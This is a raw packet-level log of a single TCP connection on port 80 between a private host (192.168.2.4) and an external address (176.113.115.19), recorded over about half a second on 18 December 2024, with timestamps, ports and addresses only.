Dec 18, 2024 21:09:52.612379074 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.612379074 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.620402098 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.620490074 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.620534897 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.620743990 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.627249956 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.627336025 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.663805962 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.663903952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.663908005 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.664031029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.736495018 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.736584902 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.736665010 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.736756086 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.738739014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.738864899 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.738924980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.739097118 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.743432045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.743510008 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.743587017 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.743680000 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.748013020 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.748076916 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.748128891 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.748312950 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.752620935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.752734900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.752787113 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.752861023 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.757303953 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.757369995 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.757498980 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.757556915 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.761929989 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.762067080 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.762082100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.762151957 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.766489029 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.766602039 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.766635895 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.766711950 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.771223068 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.771332026 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.771341085 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.771428108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.775770903 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.775924921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.775995970 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.775995970 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.780405045 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.780524969 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.780632019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.781083107 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.785093069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.785183907 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.785231113 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.785231113 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.789839983 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.789948940 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.789983034 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.790134907 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.794379950 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.794512987 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.794529915 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.794591904 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.799057007 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.799175024 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.799242020 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.799242973 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.802568913 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.802690029 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.802696943 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.802743912 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.811870098 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.811889887 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.811961889 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.813909054 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.813993931 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.814089060 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.814320087 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.817476034 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.817636013 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.817658901 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.818197966 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.819868088 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.819885015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.819933891 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.819933891 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.822168112 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.822182894 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.822453022 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.825566053 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.825776100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.825846910 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.826003075 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.829041004 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.829193115 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.928798914 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.928869963 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.928936005 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.929085970 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.930401087 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.930470943 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.930494070 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.930553913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.932820082 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.933003902 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.933259964 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.933429003 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.935779095 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.935879946 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.935925961 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.935981035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.938766003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.938867092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.938878059 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.939069986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.941798925 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.941859007 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.941920996 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.942043066 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.944714069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.944797039 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.944909096 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.945012093 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.947506905 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.947576046 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.947683096 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.947738886 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.950210094 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.950290918 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.950344086 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.950412035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.952833891 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.952929974 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.953068018 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.953109980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.955570936 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.955636024 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.955846071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.955893993 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.958365917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.958441019 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.958482027 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.958482027 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.960655928 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.960784912 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.960794926 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.960829973 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.963011026 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.963083982 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.963116884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.963171005 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.965584993 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.965631962 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.965861082 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.965945959 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.968116999 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.968173981 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.968218088 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.968271971 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.970618963 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.970709085 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.970740080 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.970809937 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.973252058 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.973318100 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.973340988 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.973563910 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.975711107 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.975776911 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.975954056 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.976043940 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.978306055 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.978452921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.978492975 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.978564978 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.980779886 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.980856895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.980906010 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.981000900 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.983330011 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.983408928 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.983459949 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.983520985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.985825062 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.985919952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.985964060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.985964060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.988382101 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.988451958 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.988548040 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.988761902 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.990941048 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.991060019 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.991069078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.991127968 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.993475914 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.993570089 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.993607044 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.993664980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.996057034 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.996182919 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.996215105 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.996227980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.998574972 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.998660088 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:52.998703957 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:52.998788118 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.001135111 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.001202106 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.001214027 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.001286983 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.003663063 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.003719091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.003796101 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.003845930 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.006244898 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.006331921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.006371975 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.006372929 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.008874893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.008959055 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.008966923 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.009035110 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.011331081 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.011460066 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.011460066 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.011585951 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.013906002 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.014060974 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.014137030 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.014462948 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.016509056 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.016562939 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.016644001 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.016750097 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.018930912 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.018989086 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.019017935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.019078970 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.021419048 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.021476984 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.120944023 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.121191025 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.121247053 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.121248007 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.121967077 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.122095108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.122133970 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.122262001 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.124116898 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.124280930 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.124290943 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.124350071 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.126224041 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.126341105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.126389980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.126389980 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.128356934 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.128417969 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.128457069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.128619909 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.130419016 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.130481005 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.130526066 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.130526066 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.132600069 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.132667065 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.132700920 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.132859945 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.134474039 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.134577990 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.134628057 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.134628057 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.136485100 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.136569977 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.136594057 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.136708975 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.138446093 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.138539076 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.138578892 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.138642073 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.140337944 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.140391111 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.140458107 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.140583992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.142216921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.142324924 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.142402887 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.142469883 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.144211054 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.144304991 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.144310951 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.144454956 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.145978928 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.146183968 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.146222115 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.146622896 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.147835016 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.147958040 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.148008108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.148008108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.149761915 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.149815083 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.149883032 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.149930954 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.151609898 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.151664019 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.151710987 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.151793003 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.153448105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.153589010 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.153613091 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.153654099 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.155306101 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.155395985 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.155433893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.155494928 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.157207966 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.157277107 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.157294035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.157383919 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.159055948 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.159111023 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.159152985 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.159307957 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.161029100 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.161129951 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.161150932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.161258936 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.162823915 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.162904978 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.162914038 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.162976027 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.164732933 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.164791107 CET	49731	80	192.168.2.4	176.113.115.19
